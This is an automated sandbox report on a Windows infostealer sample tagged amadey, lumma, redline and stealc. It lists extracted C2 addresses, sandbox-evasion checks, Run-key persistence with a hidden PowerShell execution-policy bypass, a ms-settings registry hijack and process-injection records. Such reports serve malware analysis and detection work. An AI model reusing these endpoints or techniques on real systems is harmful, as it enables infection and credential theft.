amadey | 3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d

Analysis

max time kernel
137s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23-12-2024 17:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe
Size

3.1MB
MD5

cf6393e173fb6315d0c681bc78eb3528
SHA1

26dc307ae4ea1866d40c9a34e38768733ec30b34
SHA256

3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d
SHA512

47e722c9f4736faf9612aff748cb4e1211e00ffe0fe56a65dc0dbec07f7b5e81908269d7c31066250866f3459727874d88c27fa88be08e540d0eb1e048ced61f
SSDEEP

24576:O/Nvd7MjWuH7NZRmw3vb+VBi7cCgTUvRS6r0EexLRdno+gSMW7GQJKTJjmX0/4hH:kliWo533j+na3bJrGYnlCJMdPS/b

Score

10^/10

amadey lumma redline stealc 1488traffer 9c9aa5 stok credential_access discovery evasion execution infostealer persistence privilege_escalation spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

https://pollution-raker.cyou/api

https://hosue-billowy.cyou/api

https://ripe-blade.cyou/api

https://smash-boiling.cyou/api

https://supporse-comment.cyou/api

https://greywe-snotty.cyou/api

https://steppriflej.xyz/api

https://sendypaster.xyz/api

Extracted

Family

redline

Botnet

1488Traffer

147.45.44.224:1912

Extracted

Family

stealc

Botnet

stok

http://185.215.113.206

Attributes

url_path
/c4becf79229cb002.php

Extracted

Family

lumma

https://sendypaster.xyz/api

https://steppriflej.xyz/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023cd6-101.dat	family_redline
behavioral2/memory/4220-108-0x0000000000BE0000-0x0000000000C32000-memory.dmp	family_redline

Redline family
redline
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	afa370d0bc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d797bcefb6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	44d5c151a7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	SdVB3P2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
8044	powershell.exe
6508	powershell.exe
5104	powershell.exe
7092	powershell.exe
7684	powershell.exe
4384	powershell.exe
4276	powershell.exe
4940	powershell.exe
6660	powershell.exe
1320	powershell.exe
6248	powershell.exe
6480	powershell.exe
4292	powershell.exe
7312	powershell.exe
5892	powershell.exe
1520	powershell.exe
4684	powershell.exe
7804	powershell.exe
7500	powershell.exe
968	powershell.exe
5084	powershell.exe
7452	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
7436	netsh.exe

Uses browser remote debugging 2 TTPs 22 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
1528	chrome.exe
6292	chrome.exe
5076	chrome.exe
4320	chrome.exe
1884	chrome.exe
6776	chrome.exe
5788	chrome.exe
5776	chrome.exe
5864	chrome.exe
6356	chrome.exe
1144	chrome.exe
5044	msedge.exe
3284	msedge.exe
2972	chrome.exe
2812	chrome.exe
3808	chrome.exe
180	msedge.exe
5684	chrome.exe
6380	chrome.exe
1044	msedge.exe
5392	chrome.exe
3088	chrome.exe

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	SdVB3P2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	afa370d0bc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	44d5c151a7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	44d5c151a7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SdVB3P2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d797bcefb6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	afa370d0bc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d797bcefb6.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	I0XmI2t.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	5a0a0a9d4b.exe

Executes dropped EXE 31 IoCs

pid	Process
1276	skotes.exe
5088	SdVB3P2.exe
884	I0XmI2t.exe
4660	mdjw5me.exe
1860	mdjw5me.exe
900	mdjw5me.exe
392	mdjw5me.exe
4220	DJj.exe
404	skotes.exe
1784	skotes.exe
4304	client.exe
384	client.exe
2564	d99c45b302.exe
100	d99c45b302.exe
3348	d99c45b302.exe
5440	afa370d0bc.exe
3300	5a0a0a9d4b.exe
5292	7z.exe
5328	7z.exe
5396	7z.exe
5392	7z.exe
5460	7z.exe
396	7z.exe
5360	7z.exe
5552	7z.exe
5604	in.exe
5868	d797bcefb6.exe
6824	client.exe
4612	client.exe
2700	44d5c151a7.exe
7052	10168a5d6b.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine	SdVB3P2.exe
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine	afa370d0bc.exe
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine	d797bcefb6.exe
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine	44d5c151a7.exe

Loads dropped DLL 64 IoCs

pid	Process
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
5292	7z.exe
5328	7z.exe
5396	7z.exe
5392	7z.exe
5460	7z.exe
396	7z.exe
5360	7z.exe
5552	7z.exe
4612	client.exe
4612	client.exe
4612	client.exe
4612	client.exe
4612	client.exe
4612	client.exe
4612	client.exe
4612	client.exe
4612	client.exe
4612	client.exe
4612	client.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\wtEGjhvMNCDYanm.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d797bcefb6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1021163001\\d797bcefb6.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\44d5c151a7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1021164001\\44d5c151a7.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\10168a5d6b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1021165001\\10168a5d6b.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
100	raw.githubusercontent.com
101	raw.githubusercontent.com
182	raw.githubusercontent.com
294	drive.google.com
295	drive.google.com

Looks up external IP address via web service 10 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
152	ipapi.co
171	api.ipify.org
178	api.ipify.org
311	ipinfo.io
312	ipinfo.io
147	api.ipify.org
148	api.ipify.org
150	api.ipify.org
153	ipapi.co
173	ipapi.co

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0007000000023e83-3674.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
4520	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

pid	Process
3208	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe
1276	skotes.exe
5088	SdVB3P2.exe
404	skotes.exe
1784	skotes.exe
384	client.exe
5440	afa370d0bc.exe
5868	d797bcefb6.exe
4612	client.exe
2700	44d5c151a7.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4660 set thread context of 392	4660	mdjw5me.exe	96
PID 2564 set thread context of 3348	2564	d99c45b302.exe	121

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5604-2146-0x00007FF776A70000-0x00007FF776F00000-memory.dmp	upx
behavioral2/memory/5604-2149-0x00007FF776A70000-0x00007FF776F00000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
7280	5440	WerFault.exe	132
1636	5440	WerFault.exe	132

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SdVB3P2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mdjw5me.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d99c45b302.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5a0a0a9d4b.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	10168a5d6b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DJj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mdjw5me.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d99c45b302.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	44d5c151a7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d797bcefb6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	10168a5d6b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	10168a5d6b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	afa370d0bc.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5664	powershell.exe
6124	PING.EXE

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
8020	ipconfig.exe
8096	ipconfig.exe
6332	ipconfig.exe
6268	ipconfig.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
8188	systeminfo.exe
6188	systeminfo.exe

Kills process with taskkill 9 IoCs

evasion

pid	Process
7040	taskkill.exe
7412	taskkill.exe
7332	taskkill.exe
7388	taskkill.exe
7396	taskkill.exe
1884	taskkill.exe
7016	taskkill.exe
660	taskkill.exe
4352	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133794485558192292"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\shell\open\command\DelegateExecute	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\shell\open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\shell\open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1021127001\\client.exe"	reg.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
6636	reg.exe
6972	reg.exe
6552	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
6124	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5644	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3208	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe
3208	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe
1276	skotes.exe
1276	skotes.exe
5088	SdVB3P2.exe
5088	SdVB3P2.exe
4684	powershell.exe
4684	powershell.exe
4220	DJj.exe
4220	DJj.exe
4220	DJj.exe
404	skotes.exe
404	skotes.exe
1784	skotes.exe
1784	skotes.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
3540	msedge.exe
3540	msedge.exe
4320	chrome.exe
4320	chrome.exe
5440	afa370d0bc.exe
5440	afa370d0bc.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
384	client.exe
7500	powershell.exe
7500	powershell.exe
7804	powershell.exe
7804	powershell.exe
5664	powershell.exe
5664	powershell.exe
5664	powershell.exe
5868	d797bcefb6.exe
5868	d797bcefb6.exe
968	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
2812	chrome.exe
2812	chrome.exe
2812	chrome.exe
2812	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4684	powershell.exe
Token: SeDebugPrivilege	4220	DJj.exe
Token: SeDebugPrivilege	384	client.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeDebugPrivilege	7388	taskkill.exe
Token: SeDebugPrivilege	7396	taskkill.exe
Token: SeDebugPrivilege	7500	powershell.exe
Token: SeDebugPrivilege	7804	powershell.exe
Token: SeDebugPrivilege	4520	tasklist.exe
Token: SeRestorePrivilege	5292	7z.exe
Token: 35	5292	7z.exe
Token: SeSecurityPrivilege	5292	7z.exe
Token: SeSecurityPrivilege	5292	7z.exe
Token: SeRestorePrivilege	5328	7z.exe
Token: 35	5328	7z.exe
Token: SeSecurityPrivilege	5328	7z.exe
Token: SeSecurityPrivilege	5328	7z.exe
Token: SeRestorePrivilege	5396	7z.exe
Token: 35	5396	7z.exe
Token: SeSecurityPrivilege	5396	7z.exe
Token: SeSecurityPrivilege	5396	7z.exe
Token: SeRestorePrivilege	5392	7z.exe
Token: 35	5392	7z.exe
Token: SeSecurityPrivilege	5392	7z.exe
Token: SeSecurityPrivilege	5392	7z.exe
Token: SeRestorePrivilege	5460	7z.exe
Token: 35	5460	7z.exe
Token: SeSecurityPrivilege	5460	7z.exe
Token: SeSecurityPrivilege	5460	7z.exe
Token: SeRestorePrivilege	396	7z.exe
Token: 35	396	7z.exe
Token: SeSecurityPrivilege	396	7z.exe
Token: SeSecurityPrivilege	396	7z.exe
Token: SeRestorePrivilege	5360	7z.exe
Token: 35	5360	7z.exe
Token: SeSecurityPrivilege	5360	7z.exe
Token: SeSecurityPrivilege	5360	7z.exe
Token: SeRestorePrivilege	5552	7z.exe
Token: 35	5552	7z.exe
Token: SeSecurityPrivilege	5552	7z.exe
Token: SeSecurityPrivilege	5552	7z.exe
Token: SeDebugPrivilege	5664	powershell.exe
Token: SeSecurityPrivilege	6712	wevtutil.exe
Token: SeBackupPrivilege	6712	wevtutil.exe
Token: SeSecurityPrivilege	6904	wevtutil.exe
Token: SeBackupPrivilege	6904	wevtutil.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	5084	powershell.exe
Token: SeDebugPrivilege	4612	client.exe
Token: SeDebugPrivilege	8044	powershell.exe
Token: SeDebugPrivilege	4276	powershell.exe
Token: SeDebugPrivilege	7452	powershell.exe
Token: SeShutdownPrivilege	2812	chrome.exe
Token: SeCreatePagefilePrivilege	2812	chrome.exe
Token: SeDebugPrivilege	6480	powershell.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
3208	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe
4320	chrome.exe
2812	chrome.exe
7052	10168a5d6b.exe
7052	10168a5d6b.exe
7052	10168a5d6b.exe
7052	10168a5d6b.exe
7052	10168a5d6b.exe
7052	10168a5d6b.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
7052	10168a5d6b.exe
7052	10168a5d6b.exe
7052	10168a5d6b.exe
7052	10168a5d6b.exe
7052	10168a5d6b.exe
7052	10168a5d6b.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3208 wrote to memory of 1276	3208	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe	82
PID 3208 wrote to memory of 1276	3208	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe	82
PID 3208 wrote to memory of 1276	3208	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe	82
PID 1276 wrote to memory of 5088	1276	skotes.exe	83
PID 1276 wrote to memory of 5088	1276	skotes.exe	83
PID 1276 wrote to memory of 5088	1276	skotes.exe	83
PID 1276 wrote to memory of 884	1276	skotes.exe	88
PID 1276 wrote to memory of 884	1276	skotes.exe	88
PID 884 wrote to memory of 4684	884	I0XmI2t.exe	90
PID 884 wrote to memory of 4684	884	I0XmI2t.exe	90
PID 1276 wrote to memory of 4660	1276	skotes.exe	92
PID 1276 wrote to memory of 4660	1276	skotes.exe	92
PID 1276 wrote to memory of 4660	1276	skotes.exe	92
PID 4660 wrote to memory of 1860	4660	mdjw5me.exe	94
PID 4660 wrote to memory of 1860	4660	mdjw5me.exe	94
PID 4660 wrote to memory of 1860	4660	mdjw5me.exe	94
PID 4660 wrote to memory of 900	4660	mdjw5me.exe	95
PID 4660 wrote to memory of 900	4660	mdjw5me.exe	95
PID 4660 wrote to memory of 900	4660	mdjw5me.exe	95
PID 4660 wrote to memory of 392	4660	mdjw5me.exe	96
PID 4660 wrote to memory of 392	4660	mdjw5me.exe	96
PID 4660 wrote to memory of 392	4660	mdjw5me.exe	96
PID 4660 wrote to memory of 392	4660	mdjw5me.exe	96
PID 4660 wrote to memory of 392	4660	mdjw5me.exe	96
PID 4660 wrote to memory of 392	4660	mdjw5me.exe	96
PID 4660 wrote to memory of 392	4660	mdjw5me.exe	96
PID 4660 wrote to memory of 392	4660	mdjw5me.exe	96
PID 4660 wrote to memory of 392	4660	mdjw5me.exe	96
PID 884 wrote to memory of 4220	884	I0XmI2t.exe	99
PID 884 wrote to memory of 4220	884	I0XmI2t.exe	99
PID 884 wrote to memory of 4220	884	I0XmI2t.exe	99
PID 1276 wrote to memory of 4304	1276	skotes.exe	104
